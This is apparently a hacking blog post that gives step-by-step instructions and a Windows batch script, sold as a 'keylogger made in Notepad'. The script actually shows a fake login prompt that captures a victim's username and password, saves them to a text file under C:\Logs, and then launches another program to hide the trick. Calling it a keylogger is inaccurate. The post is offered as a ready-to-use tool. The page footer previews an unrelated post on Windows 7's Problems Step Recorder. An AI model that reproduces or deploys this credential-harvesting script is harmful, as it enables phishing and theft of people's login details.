Skip to main content

How to Creating Keylogger With Notepad



1.Now in notepad copy and paste the below code in it.
@echo off
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:\Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit
2.Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs).
3.Cut this folder and paste it into drive C:\ .
4.Now test your file Log.bat and then after entering the Username and password open the folder in C drive and see all saved key logs there as a text file created there automatically.
5.Thats it you are done, you have successfully created a keylogger in notepad.
Like: https://www.facebook.com/ILoveHacking

Comments

Popular posts from this blog

Unknown Windows 7 feature: Problems Step Recorder (PSR)

Welcome everyone. You all know that Windows 7 is one of the most finest OS from Microsoft , generally praised by critics, who considers the  operating system  as major improvement over its predecessor due to its increased performance, its more intuitive interface , fewer User Account Control popups,etc & also being a major success for Microsoft; even prior to its official release. ALSO READ:  Windows 10 Free Update to windows 8 users. I’m a bit late in posting this one, but this isn’t still known for many of them..This article is about a hidden (literally) Windows 7 Feature -It’s called the Problems Step Recorder (PSR) intended to  record  the problem that you encounter in your system and save it as a file and then you can share with Microsoft support team or somebody who is helping you to solve the problem. PSR records the steps you’ve taken on the computer automatically including mouse clicks. You can use these recordings to speed up issues when you’re dealing with tech suppo

Best Books